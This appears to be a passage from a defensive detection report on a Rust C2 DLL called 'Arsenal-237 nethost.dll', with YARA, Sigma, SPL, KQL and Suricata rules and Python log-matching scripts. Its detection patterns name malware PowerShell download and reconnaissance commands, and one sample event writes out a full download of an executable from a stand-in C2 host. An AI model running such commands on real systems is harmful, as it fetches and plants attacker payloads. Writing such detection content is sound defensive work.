Arsenal-237 C2 Communication Module Report
Report Date: 2026-01-26
YARA Rules
Rule 1: Arsenal-237 nethost.dll File Hash Detection
```yara
import "hash"

rule Arsenal237_nethost_dll_hash_detection {
    meta:
        author = "The Hunters Ledger"
        description = "Detects Arsenal-237 nethost.dll by known file hashes"
        date = "2026-01-26"
        threat_level = "CRITICAL"
        malware_type = "C2 Communication Module"
        sha256 = "158f61b6d10ea2ce78769703a2ffbba9c08f0172e37013de960d9efe5e9fde14"
        md5 = "f91ff1bb5699524524fff0e2587af040"
        sha1 = "622ddbacaf769aef383435162a203489c08c8468"
    strings:
        $filename = "nethost.dll" nocase
    condition:
        // A file never contains its own hex digest, so the digests are computed
        // with the hash module rather than searched for as text strings.
        hash.sha256(0, filesize) == "158f61b6d10ea2ce78769703a2ffbba9c08f0172e37013de960d9efe5e9fde14" or
        hash.md5(0, filesize) == "f91ff1bb5699524524fff0e2587af040" or
        hash.sha1(0, filesize) == "622ddbacaf769aef383435162a203489c08c8468" or
        // Name-only hits are weaker: any PE that embeds the name matches, so
        // treat them as triage leads rather than confirmed detections.
        (uint16(0) == 0x5a4d and $filename)
}
```
Rule 2: Arsenal-237 nethost.dll Hardcoded C2 Detection
```yara
rule Arsenal237_nethost_dll_c2_strings {
    meta:
        author = "The Hunters Ledger"
        description = "Detects nethost.dll by hardcoded C2 target strings"
        date = "2026-01-26"
        threat_level = "CRITICAL"
    strings:
        // Rust string literals are not NUL-terminated, so adjacent literals
        // sit back-to-back in the binary's read-only data.
        $c2_targets = "8.8.8.8:53127.0.0.1ntdll.dll"
        $env_discovery = "COMPUTERNAMEUSERNAME"
        $rust_panic = "runtime error"
        $winsock_init = "WSAStartup"
    condition:
        // YARA refuses to compile a rule with unreferenced strings, so the two
        // supporting indicators are required alongside a C2 or discovery string.
        uint16(0) == 0x5a4d and
        ($c2_targets or $env_discovery) and
        ($winsock_init or $rust_panic)
}
```
Rule 3: Arsenal-237 nethost.dll PowerShell Template Detection
```yara
rule Arsenal237_nethost_dll_powershell_templates {
    meta:
        author = "The Hunters Ledger"
        description = "Detects nethost.dll by embedded PowerShell command templates"
        date = "2026-01-26"
        threat_level = "HIGH"
    strings:
        // The empty '' quotes are placeholders the module fills at runtime.
        $ps_service = "Get-Service|?{$_.Status -eq ''}"
        $ps_download = "Invoke-WebRequest -Uri '' -OutFile ''"
        $upload_prefix = "pathB64:"
        $response_keywords = "resultmachine_idsuccess"
    condition:
        3 of them and uint16(0) == 0x5a4d
}
```
Rule 4: Arsenal-237 nethost.dll Winsock Initialization Pattern
```yara
rule Arsenal237_nethost_dll_winsock_init {
    meta:
        author = "The Hunters Ledger"
        description = "Detects nethost.dll by Winsock initialization pattern"
        date = "2026-01-26"
        threat_level = "HIGH"
    strings:
        $ws_startup = { C7 ?? ?? 02 02 00 } // WSAStartup with version 0x202
        $wsa_socket = "WSASocket"
        $connect_api = "connect"            // common word; only meaningful with the others
        $env_vars = "COMPUTERNAME"
    condition:
        all of them and uint16(0) == 0x5a4d
}
```
Rule 5: Arsenal-237 nethost.dll Rust Compilation Signature
```yara
rule Arsenal237_nethost_dll_rust_indicators {
    meta:
        author = "The Hunters Ledger"
        description = "Detects nethost.dll by Rust compilation indicators"
        date = "2026-01-26"
        threat_level = "MEDIUM"
    strings:
        $rust_panic = "rust_panic"
        $rustc_artifact = ".rustc_artifact"
        $rust_std = "std::panic"
        $debug_assertion = "assertion `left == right` failed"
    condition:
        // The reported sample size (440,832 bytes) is checked with filesize
        // rather than searched for as a byte pattern; it counts as one indicator.
        uint16(0) == 0x5a4d and
        (2 of them or (1 of them and filesize == 440832))
}
```
Sigma Detection Rules
Sigma Rule 1: Network Connection to C2 Targets
```yaml
title: Arsenal-237 nethost.dll C2 Connection Attempt
description: Detects network connections to known Arsenal-237 C2 infrastructure
logsource:
  category: network_connection
  product: windows
detection:
  c2_connection:
    DestinationIp:
      - 8.8.8.8
      - 127.0.0.1
    DestinationPort: 53
    Protocol: tcp
  process_filter:
    Image|endswith:
      - nethost.dll   # a library, not a process image; kept from the report, will not match Sysmon Image
      - explorer.exe
      - svchost.exe
      - rundll32.exe
      - powershell.exe
  filter_legitimate:
    DestinationIp: 8.8.8.8
    Protocol: udp
  condition: c2_connection and process_filter and not filter_legitimate
falsepositives:
  - Legitimate DNS queries to Google Public DNS
  - System DNS resolution to 8.8.8.8 via UDP (legitimate; TCP is suspicious)
level: critical
tags:
  - attack.command_and_control
  - attack.t1071
  - arsenal-237
  - c2_communication
```
Sigma Rule 2: Suspicious DLL Injection with nethost.dll
```yaml
title: Arsenal-237 nethost.dll DLL Injection Attempt
description: Detects DLL injection of nethost.dll or similar network modules
logsource:
  category: process_creation
  product: windows
detection:
  dll_injection:
    CommandLine|contains:
      - 'LoadLibrary*nethost.dll'
      - 'GetProcAddress*WSASocket'
      - 'inject*nethost'
  suspicious_loader:
    ParentImage|endswith:
      - explorer.exe
      - svchost.exe
      - rundll32.exe
      - regsvcs.exe
      - regasm.exe
  suspicious_dll_path:
    Image|contains:
      - '\Temp\'
      - '\AppData\'
      - '\Users\Public'
  condition: (dll_injection or suspicious_loader) and suspicious_dll_path
falsepositives:
  - Legitimate software installation procedures
level: high
tags:
  - attack.defense_evasion
  - attack.t1055
  - arsenal-237
```
Sigma Rule 3: PowerShell Execution with Malware Command Templates
```yaml
title: Arsenal-237 nethost.dll PowerShell Template Execution
description: Detects PowerShell execution with known malware command templates
logsource:
  category: process_creation
  product: windows
detection:
  powershell_execution:
    Image|endswith: powershell.exe
  malware_templates:
    CommandLine|contains:
      - 'Get-Service|?{$_.Status -eq'
      - 'Invoke-WebRequest -Uri'
      - 'Select Name,Status|FT'
  suspicious_parent:
    ParentImage|endswith:
      - rundll32.exe
      - regsvcs.exe
      - explorer.exe
      - svchost.exe
  condition: powershell_execution and malware_templates and suspicious_parent
falsepositives:
  - Legitimate system administration scripts
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - arsenal-237
```
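The templates in YARA Rule 3 carry empty '' placeholders that the module fills before execution, so the text that reaches process-creation logs never equals the template literally. The following Python script, added here as an illustration and not part of The Hunters Ledger report, turns each template into a regex that accepts any quoted value in the placeholder positions and then applies the Sigma Rule 3 condition (powershell.exe, a parent from the watch list, at least one template) to constructed sample events. The event field names follow Sysmon process-creation logs; the sample command lines and paths are invented.

```python
"""Match executed PowerShell command lines against the Arsenal-237 templates."""
import re

# Command templates as embedded in the sample (YARA Rule 3 on this page). The
# empty '' quotes are placeholders the module fills before execution.
TEMPLATES = {
    "service_enum": "Get-Service|?{$_.Status -eq ''}",
    "download": "Invoke-WebRequest -Uri '' -OutFile ''",
}

# Parent images listed in Sigma Rule 3. explorer.exe is on the list, so an
# interactive console launched from the desktop also satisfies this check.
SUSPICIOUS_PARENTS = ("rundll32.exe", "regsvcs.exe", "explorer.exe", "svchost.exe")


def template_to_regex(template: str) -> "re.Pattern":
    """Escape the template, let '' accept any quoted value, tolerate whitespace
    around the pipe, and ignore case (PowerShell cmdlet names are case-insensitive)."""
    pattern = re.escape(template)
    pattern = pattern.replace(re.escape("''"), r"'[^']*'")
    pattern = pattern.replace(re.escape("|"), r"\s*\|\s*")
    return re.compile(pattern, re.IGNORECASE)


COMPILED = {name: template_to_regex(t) for name, t in TEMPLATES.items()}


def basename(path: str) -> str:
    """Last path component, accepting Windows or POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matched_templates(command_line: str) -> list:
    """Names of every template the command line instantiates."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]


def evaluate(event: dict) -> list:
    """Apply the Sigma Rule 3 condition to one process-creation event."""
    if basename(event["Image"]) != "powershell.exe":
        return []
    if basename(event["ParentImage"]) not in SUSPICIOUS_PARENTS:
        return []
    return matched_templates(event["CommandLine"])


# Constructed sample events (invented, not real telemetry).
SAMPLE_EVENTS = [
    {   # template with the placeholder filled, launched from rundll32 -> hit
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": "powershell.exe -NoP -C \"Get-Service | ?{$_.Status -eq 'Running'}\"",
    },
    {   # download template from svchost -> hit
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": "powershell -c \"Invoke-WebRequest -Uri 'http://c2.example.invalid/p' -OutFile 'C:\\Users\\Public\\p.exe'\"",
    },
    {   # same cmdlet chain from an admin tool not on the parent list -> no hit
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\AdminTool\admintool.exe",
        "CommandLine": "powershell.exe -File C:\\scripts\\check.ps1 Get-Service | ?{$_.Status -eq 'Stopped'}",
    },
    {   # Get-Service without the template's filter block -> no hit
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-Service | Select Name,Status",
    },
]


def scan(events=SAMPLE_EVENTS) -> list:
    """Return (event index, matched template names) for every firing event."""
    out = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for idx, names in scan():
        print(f"event {idx}: {', '.join(names)}  <- {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The third sample shows why the parent-image clause matters for tuning: the same cmdlet chain run by an administrative tool that is not on the list does not fire, whereas the same command from explorer.exe would.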
Sigma Rule 4: Environment Variable Discovery (COMPUTERNAME/USERNAME)
```yaml
title: Arsenal-237 System Reconnaissance - Environment Variable Discovery
description: Detects suspicious queries for COMPUTERNAME and USERNAME environment variables
logsource:
  category: process_creation
  product: windows
detection:
  env_discovery:
    CommandLine|contains:
      - 'GetEnvironmentVariable*COMPUTERNAME'
      - 'GetEnvironmentVariable*USERNAME'
      - '%COMPUTERNAME%'
      - '%USERNAME%'
  suspicious_process:
    Image|endswith:
      - rundll32.exe
      - regsvcs.exe
      - powershell.exe
      - cmd.exe
  filter_legitimate:
    CommandLine|contains:
      - 'echo %COMPUTERNAME%'
      - 'hostname'
      - 'whoami'
  condition: env_discovery and suspicious_process and not filter_legitimate
falsepositives:
  - System administration scripts
  - Legitimate batch files querying environment variables
level: medium
tags:
  - attack.discovery
  - attack.t1082
  - arsenal-237
```
Sigma Rule 5: Suspicious Network Reconnaissance Commands
```yaml
title: Arsenal-237 System Reconnaissance Commands
description: Detects execution of reconnaissance commands (sysinfo, services, processes)
logsource:
  category: process_creation
  product: windows
detection:
  recon_commands:
    Image|endswith:
      - cmd.exe
      - powershell.exe
    CommandLine|contains:
      - 'Get-Service'
      - 'Get-Process'
      - 'systeminfo'
      - 'tasklist'
      - 'net user'
      - 'wmic os get'
      - 'ipconfig'
  suspicious_parent:
    ParentImage|endswith:
      - rundll32.exe
      - regsvcs.exe
      - explorer.exe
      - svchost.exe
  # Sigma evaluates one event at a time and has no nested selection syntax;
  # sequencing across events is left to the SIEM (see SPL Query 6).
  condition: recon_commands and suspicious_parent
falsepositives:
  - Legitimate system administration
  - Help desk scripts
level: medium
tags:
  - attack.discovery
  - attack.t1057
  - attack.t1082
  - arsenal-237
```
Splunk SPL Queries
Query 1: Detect Connections to C2 Infrastructure
```spl
(sourcetype=firewall OR sourcetype=wineventlog)
((dest_ip=8.8.8.8 AND dest_port=53 AND protocol=tcp)
 OR (dest_ip=127.0.0.1 AND dest_port=53 AND protocol=tcp))
| stats count by src_ip, dest_ip, dest_port, src_process, user
| sort - count
```
Use Case: Identify network connections to known Arsenal-237 C2 targets at the firewall level. Splunk evaluates OR before the implicit AND between terms, so the sourcetype alternatives and the destination clauses are each parenthesized.
Query 2: Detect nethost.dll File Creation
```spl
sourcetype=wineventlog EventID=11
(FileName=nethost.dll OR FileName=*nethost*)
| stats count by host, FileName, TargetFilename, SourceIp
| sort - count
```
Use Case: Monitor for nethost.dll creation in logs (Sysmon Event ID 11, FileCreate: a file object added to the system).
Query 3: Detect PowerShell Execution with Malware Templates
```spl
sourcetype=powershell
((CommandLine="*Get-Service*" AND CommandLine="*Status -eq*")
 OR (CommandLine="*Invoke-WebRequest*" AND CommandLine="*-OutFile*"))
| stats count by host, CommandLine, user, process_id
| sort - count
```
Use Case: Hunt for PowerShell commands matching Arsenal-237 templates in PowerShell transcript logs.
Query 4: Detect Suspicious DLL Loading
```spl
sourcetype=wineventlog (EventID=7 OR EventCode=7)
(ImageLoaded="*nethost.dll" OR ImageLoaded="*\\Temp\\*.dll")
| stats count by host, Image, ImageLoaded, SourceIp
| sort - count
```
Use Case: Monitor for suspicious DLL loading events (Sysmon Event ID 7, Image Loaded).
Query 5: Detect Process Injection from Suspicious Parents
```spl
sourcetype=wineventlog EventCode=1
(ParentImage=*rundll32.exe OR ParentImage=*regsvcs.exe OR ParentImage=*explorer.exe)
(Image=*powershell.exe OR Image=*cmd.exe)
| stats count by host, ParentImage, Image, CommandLine
| where count >= 2
| sort - count
```
Use Case: Identify parent-child process patterns suggesting malware deployment.
Query 6: Detect Reconnaissance Command Sequence
```spl
sourcetype=wineventlog EventCode=1
(Image=*cmd.exe OR Image=*powershell.exe)
(CommandLine=*systeminfo* OR CommandLine=*Get-Service* OR CommandLine=*Get-Process* OR CommandLine=*net user*)
| dedup host, user, CommandLine
| stats count by host, user
| where count >= 3
| sort - count
```
Use Case: Identify sequences of reconnaissance commands on the same host. The dedup keeps one row per distinct command line, so the count is the number of different reconnaissance commands each user ran on each host.
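Sigma Rule 5 scores single events and SPL Query 6 counts distinct commands per host with no time bound. The Python below, an added example rather than code from The Hunters Ledger report, carries the same idea one step further: it groups shell process-creation events by host and user and reports an actor once at least three distinct reconnaissance markers appear inside a sliding time window. The ten-minute window is an assumption introduced here so that a day's worth of unrelated administrative commands does not accumulate into a hit; the events, hosts and users are constructed.

```python
"""Find reconnaissance command sequences per host/user inside a time window."""
from collections import defaultdict
from datetime import datetime, timedelta

# Command markers from Sigma Rule 5 and SPL Query 6 on this page.
RECON_MARKERS = ("systeminfo", "Get-Service", "Get-Process", "net user",
                 "tasklist", "wmic os get", "ipconfig")
SHELLS = ("cmd.exe", "powershell.exe")


def basename(path: str) -> str:
    """Last path component, accepting Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def recon_marker(command_line: str):
    """First recon marker present in the command line (case-insensitive), else None."""
    low = command_line.lower()
    for marker in RECON_MARKERS:
        if marker.lower() in low:
            return marker
    return None


def find_recon_sequences(events, window_minutes: int = 10, threshold: int = 3) -> list:
    """One finding per (host, user) whose shell processes ran at least
    `threshold` distinct recon commands within `window_minutes`."""
    window = timedelta(minutes=window_minutes)
    per_actor = defaultdict(list)
    for ev in events:
        if basename(ev["Image"]) not in SHELLS:
            continue
        marker = recon_marker(ev["CommandLine"])
        if marker:
            per_actor[(ev["Computer"], ev["User"])].append((ev["UtcTime"], marker))

    findings = []
    for (host, user), hits in per_actor.items():
        hits.sort()
        recent = []
        for ts, marker in hits:
            recent.append((ts, marker))
            recent = [(t, m) for t, m in recent if ts - t <= window]  # drop expired
            distinct = {m for _, m in recent}
            if len(distinct) >= threshold:
                findings.append({"host": host, "user": user,
                                 "start": recent[0][0], "end": ts,
                                 "commands": sorted(distinct)})
                break  # one finding per actor is enough for triage
    return sorted(findings, key=lambda f: (f["host"], f["user"]))


def _ev(host, user, when, image, cmd) -> dict:
    """Build a Sysmon-style process-creation record (constructed sample data)."""
    return {"Computer": host, "User": user, "UtcTime": when,
            "Image": "C:\\Windows\\System32\\" + image, "CommandLine": cmd}


T0 = datetime(2026, 1, 26, 9, 0)
SAMPLE_EVENTS = [
    # WS01/alice: three different recon commands within five minutes -> finding
    _ev("WS01", "CORP\\alice", T0, "cmd.exe", "cmd.exe /c systeminfo"),
    _ev("WS01", "CORP\\alice", T0 + timedelta(minutes=2), "cmd.exe", "tasklist /v"),
    _ev("WS01", "CORP\\alice", T0 + timedelta(minutes=3), "cmd.exe", "echo hello"),
    _ev("WS01", "CORP\\alice", T0 + timedelta(minutes=5), "powershell.exe", "powershell Get-Process | Select Name"),
    # WS02/bob: the same commands spread over two hours -> no finding at 10 minutes
    _ev("WS02", "CORP\\bob", T0, "cmd.exe", "systeminfo"),
    _ev("WS02", "CORP\\bob", T0 + timedelta(minutes=90), "cmd.exe", "tasklist"),
    _ev("WS02", "CORP\\bob", T0 + timedelta(minutes=120), "powershell.exe", "Get-Process"),
    # WS03/carol: three runs of one command -> only one distinct marker, no finding
    _ev("WS03", "CORP\\carol", T0, "cmd.exe", "ipconfig /all"),
    _ev("WS03", "CORP\\carol", T0 + timedelta(minutes=1), "cmd.exe", "ipconfig /release"),
    _ev("WS03", "CORP\\carol", T0 + timedelta(minutes=2), "cmd.exe", "ipconfig /renew"),
]


if __name__ == "__main__":
    for f in find_recon_sequences(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']}: {', '.join(f['commands'])} between {f['start']} and {f['end']}")
```

Widening the window to three hours makes bob's spread-out commands fire too, which is the trade-off the window parameter exposes: a short window lowers false positives from routine administration, a long one catches a slower operator.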
KQL Queries (Microsoft Sentinel / Microsoft Defender)
The queries use the Sentinel column name TimeGenerated; in the Defender portal's advanced hunting the same tables expose that column as Timestamp.
Query 1: Network Detection - Connections to C2 IPs
```kql
DeviceNetworkEvents
| where RemoteIP in ("8.8.8.8", "127.0.0.1") and RemotePort == 53
| where Protocol =~ "tcp"   // UDP/53 to 8.8.8.8 is ordinary DNS; only TCP is in scope
| extend ThreatIndicator = "Arsenal-237-nethost-C2"
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, ThreatIndicator
| order by TimeGenerated desc
```
Use Case: Identify network connections to known Arsenal-237 C2 infrastructure via network telemetry.
Query 2: Process Execution - Suspicious Parent/Child Relationship
```kql
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("rundll32.exe", "regsvcs.exe", "explorer.exe")
    and FileName has_any ("powershell.exe", "cmd.exe")
| extend CommandLineIndicator = "T1055-ProcessInjection"
| project TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, CommandLine, CommandLineIndicator
| order by TimeGenerated desc
```
Use Case: Detect suspicious parent-child process relationships suggesting DLL injection.
Query 3: File Creation - nethost.dll Detection
```kql
DeviceFileEvents
| where FileName =~ "nethost.dll" or FileName endswith "nethost.dll"
| extend ThreatIndicator = "Arsenal-237-nethost-DLL"
| project TimeGenerated, DeviceName, FileName, FolderPath, InitiatingProcessFileName, ThreatIndicator
| order by TimeGenerated desc
```
Use Case: Identify nethost.dll file creation or modification events.
Query 4: PowerShell Execution - Malware Command Templates
```kql
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where (CommandLine contains "Get-Service" and CommandLine contains "Status -eq")
    or (CommandLine contains "Invoke-WebRequest" and CommandLine contains "-OutFile")
| extend ThreatIndicator = "Arsenal-237-PowerShell-Template"
| project TimeGenerated, DeviceName, CommandLine, ProcessId, InitiatingProcessFileName, ThreatIndicator
| order by TimeGenerated desc
```
Use Case: Hunt for PowerShell commands matching Arsenal-237 templates in process telemetry.
Query 5: Registry Persistence Check
```kql
DeviceRegistryEvents
| where RegistryKey has_any (
    @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    @"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
)
| where RegistryValueData contains "nethost" or RegistryValueData contains "cmd"   // "cmd" alone is broad; expect tuning
| extend ThreatIndicator = "Arsenal-237-Persistence"
| project TimeGenerated, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, ThreatIndicator
| order by TimeGenerated desc
```
Use Case: Identify suspicious registry persistence mechanisms associated with Arsenal-237.
Suricata Network Signatures
Signature 1: Detect Connections to C2 Addresses (Port 53/TCP)
```suricata
# Suricata accepts multi-line rules when each continued line ends in a backslash.
# The C2 channel is raw TCP on port 53, so no HTTP keywords apply to these rules.
alert tcp any any -> 8.8.8.8 53 ( \
    msg:"Arsenal-237 nethost.dll C2 Connection Attempt to 8.8.8.8:53"; \
    flow:established,to_server; \
    sid:1001001; rev:1; \
    classtype:trojan-activity; \
    metadata: policy balanced-ips drop, policy security-ips alert; \
)

# Loopback traffic never reaches a network sensor; this rule only fires on a
# host-based Suricata instance that sees the local interface.
alert tcp any any -> 127.0.0.1 53 ( \
    msg:"Arsenal-237 nethost.dll C2 Connection Attempt to localhost:53"; \
    flow:established,to_server; \
    sid:1001002; rev:1; \
    classtype:trojan-activity; \
    metadata: policy balanced-ips drop, policy security-ips alert; \
)
```
Signature 2: Detect Suspicious Non-DNS Traffic on Port 53/TCP
```suricata
# Real DNS over TCP starts with a two-byte length prefix and carries binary
# header fields, so a payload consisting only of printable text cannot be DNS.
# A network sensor has no process context, so the message names the traffic, not a process.
alert tcp any any -> any 53 ( \
    msg:"Arsenal-237 Suspicious non-DNS payload on TCP/53"; \
    flow:established,to_server; \
    dsize:>0; \
    pcre:"/^[^\x00-\x09\x0b\x0c\x0e-\x1f\x7f-\xff]*$/"; \
    sid:1001003; rev:1; \
    classtype:trojan-activity; \
)
```
Threat Hunting Playbook
Hunting Scenario 1: Find All Instances of nethost.dll
Objective: Locate all instances of nethost.dll across your infrastructure.
Tools: YARA, EDR, File Share Scanning
Procedure:
- Deploy YARA rule “Arsenal237_nethost_dll_hash_detection” across all endpoints
- Query file shares and backups for nethost.dll
- Review EDR logs for any DLL load events matching nethost.dll
- Correlate findings with process execution logs
Expected Result: Comprehensive inventory of nethost.dll instances; if any found, escalate to incident response.
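The following Python script is an added example, not code from The Hunters Ledger report, that performs the endpoint and file-share side of this scenario: it walks a directory tree, computes the three digests listed in YARA Rule 1, and separates confirmed hash matches from name-only hits (a nethost.dll on disk whose hash is not the reported sample) so that the latter can be triaged rather than escalated blindly. Only the hashes and the file name come from the page; the directory layout and any files it scans are whatever the operator points it at.

```python
"""Endpoint inventory of nethost.dll candidates for Hunting Scenario 1."""
import hashlib
import os

# Indicators from YARA Rule 1 on this page.
KNOWN_HASHES = {
    "sha256": {"158f61b6d10ea2ce78769703a2ffbba9c08f0172e37013de960d9efe5e9fde14"},
    "md5": {"f91ff1bb5699524524fff0e2587af040"},
    "sha1": {"622ddbacaf769aef383435162a203489c08c8468"},
}
TARGET_NAME = "nethost.dll"


def basename(path: str) -> str:
    """Last path component, accepting Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def digests(data: bytes) -> dict:
    """The three digests the report lists, as lowercase hex."""
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
    }


def classify(path: str, data: bytes, known: dict = KNOWN_HASHES) -> str:
    """'hash_match' for the reported sample, 'name_only' for a nethost.dll with
    a different hash (a triage lead, not a confirmed hit), else 'clean'."""
    d = digests(data)
    if any(d[algo] in values for algo, values in known.items()):
        return "hash_match"
    if basename(path) == TARGET_NAME:
        return "name_only"
    return "clean"


def inventory(root: str, known: dict = KNOWN_HASHES) -> list:
    """Walk `root` and return (path, verdict, sha256) for every non-clean file.
    Unreadable files (locked, permission denied) are skipped, not reported as
    clean; log them separately if coverage matters."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            verdict = classify(full, data, known)
            if verdict != "clean":
                hits.append((full, verdict, digests(data)["sha256"]))
    return hits


if __name__ == "__main__":
    import sys
    for path, verdict, sha in inventory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{verdict:10s} {sha}  {path}")
```

Run it against a mounted share or an endpoint's system and user directories; every hash_match line is a confirmed instance of the reported sample, while name_only lines need a second look before escalation.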
Hunting Scenario 2: Find All Connections to C2 Infrastructure
Objective: Identify any network connections to 8.8.8.8:53 or 127.0.0.1:53.
Tools: Firewall, Proxy, Network Monitoring, EDR
Procedure:
- Query firewall logs for any connections to 8.8.8.8:53 (TCP) or 127.0.0.1:53 (TCP)
- Query proxy logs for similar connections
- Query EDR for network connection telemetry matching these addresses
- For each connection found, identify source process and system
Expected Result: List of systems attempting C2 connections; investigate each for malware presence.
Hunting Scenario 3: Find PowerShell Execution with Malware Templates
Objective: Identify PowerShell execution patterns matching Arsenal-237 templates.
Tools: PowerShell Transcript Logging, EDR, SIEM
Procedure:
- Search PowerShell transcripts for commands containing "Get-Service|?{$_.Status -eq"
- Search for commands containing "Invoke-WebRequest -Uri '' -OutFile ''"
- For each match, identify parent process and user context
- Cross-reference with process creation logs
Expected Result: List of systems executing malware templates; investigate for compromise.
Hunting Scenario 4: Find Suspicious DLL Injection Events
Objective: Identify DLL injection patterns potentially associated with nethost.dll deployment.
Tools: EDR, Event Logging (Sysmon), SIEM
Procedure:
- Search Event ID 7 (Image Loaded) for DLL loads from suspicious paths (%Temp%, %AppData%)
- Identify parent processes: rundll32.exe, regsvcs.exe, explorer.exe, svchost.exe
- Look for DLL names: nethost, network, host, c2
- For each match, check for subsequent network connections
Expected Result: List of suspicious DLL injection events; escalate those with network communication.
Hunting Scenario 5: Find Environment Variable Discovery Patterns
Objective: Identify systems querying COMPUTERNAME/USERNAME in suspicious context.
Tools: EDR, PowerShell Transcript Logging, Event Logs
Procedure:
- Search for processes querying GetEnvironmentVariable(COMPUTERNAME) or GetEnvironmentVariable(USERNAME)
- Identify parent processes and context
- Look for immediate network connection attempts following variable queries
- Cross-reference with C2 connection list from Hunting Scenario 2
Expected Result: Systems performing reconnaissance; correlate with C2 connections for high-confidence detections.
Detection Coverage Matrix
| Detection Method | Coverage | Reliability | Ease of Evasion |
|---|---|---|---|
| File Hash (YARA) | Exact variant detection | HIGH | HIGH (recompilation evades) |
| String Signatures (YARA) | Hardcoded C2, templates | HIGH | MEDIUM (recompilation evades) |
| Network Signature (Suricata) | C2 connections | VERY HIGH | MEDIUM (new C2 evades) |
| Behavioral Detection (EDR) | Suspicious process behavior | HIGH | LOW (behavior patterns consistent) |
| PowerShell Transcript Analysis | Command execution tracking | HIGH | MEDIUM (obfuscation bypasses) |
| DNS Sinkhole | C2 domain resolution | HIGH | MEDIUM (new domains evade) |
| Registry Monitoring | Persistence mechanisms | MEDIUM | LOW (no registry persistence) |
| Process Injection Detection | DLL injection patterns | MEDIUM | MEDIUM (alternative methods bypass) |
Recommended Detection Deployment Priority
PHASE 1 (Days 1-3) - Emergency Detection:
- Deploy network signatures to block 8.8.8.8:53 and 127.0.0.1:53 outbound connections
- Deploy YARA file hash detection across all endpoints
- Deploy Sigma network connection rule to SIEM
PHASE 2 (Days 4-7) - Behavioral Detection:
- Deploy PowerShell transcript logging and analysis
- Deploy EDR behavioral detection rules for process injection
- Deploy Sigma detection rules for reconnaissance commands
PHASE 3 (Weeks 2-4) - Long-Term Hardening:
- Implement DNS sinkhole for known C2 domains
- Deploy next-generation firewall with C2 detection
- Establish continuous threat hunting schedule
False Positive Management
Expected False Positives:
- Legitimate Google DNS usage (8.8.8.8 port 53 UDP) - Filter out UDP traffic
- System administration scripts querying environment variables
- Standard PowerShell administration (Get-Service usage)
Tuning Recommendations:
- Filter out UDP to 8.8.8.8:53 (legitimate DNS) - focus on TCP
- Exclude known administrative PowerShell scripts from alerting
- Establish baseline for each organization’s legitimate environment variable queries
- Implement confidence levels rather than binary alerting
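The following Python, added as an example and not part of The Hunters Ledger report, applies Sigma Rule 1 and the tuning recommendations above to constructed network-connection records: UDP to 8.8.8.8:53 is dropped as ordinary DNS, TCP to a C2 target from one of the watched process images is graded critical, and TCP/53 from any other image is graded medium instead of being discarded, which is the confidence-level approach the last tuning point recommends. The medium tier and the repeat-attempt count are assumptions introduced here; the field names follow Sysmon network-connection events and all hosts, paths and addresses other than the two C2 targets are invented.

```python
"""Grade network-connection events against the Arsenal-237 C2 indicators."""
from collections import Counter

# Destinations from Sigma Rule 1 (the hardcoded C2 targets).
C2_TARGETS = {("8.8.8.8", 53), ("127.0.0.1", 53)}
# Process images Sigma Rule 1 watches.
WATCHED_IMAGES = {"explorer.exe", "svchost.exe", "rundll32.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Last path component, accepting Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def grade(event: dict) -> tuple:
    """Return (confidence, reason) for one connection event.

    'none'     destination not a C2 target, or UDP/53 (ordinary DNS resolution)
    'critical' TCP to a C2 target from a watched image (the Sigma Rule 1 hit)
    'medium'   TCP to a C2 target from any other image; a resolver may fall
               back to TCP for large answers, so this is reviewed, not alerted
    """
    dest = (event["DestinationIp"], int(event["DestinationPort"]))
    if dest not in C2_TARGETS:
        return ("none", "destination not in the C2 list")
    if event["Protocol"].lower() == "udp":
        return ("none", "UDP/53 is ordinary DNS resolution; only TCP/53 is in scope")
    image = basename(event["Image"])
    if image in WATCHED_IMAGES:
        return ("critical", f"TCP to {dest[0]}:{dest[1]} from watched image {image}")
    return ("medium", f"TCP to {dest[0]}:{dest[1]} from unlisted image {image}")


def triage(events) -> dict:
    """Map host -> list of (confidence, image, reason) for every graded event."""
    findings = {}
    for ev in events:
        conf, reason = grade(ev)
        if conf == "none":
            continue
        findings.setdefault(ev["Computer"], []).append((conf, basename(ev["Image"]), reason))
    return findings


def repeated_attempts(events, threshold: int = 3) -> list:
    """(host, image) pairs with at least `threshold` critical attempts; repeated
    attempts from one image are the pattern the firewall guidance flags."""
    counts = Counter()
    for ev in events:
        if grade(ev)[0] == "critical":
            counts[(ev["Computer"], basename(ev["Image"]))] += 1
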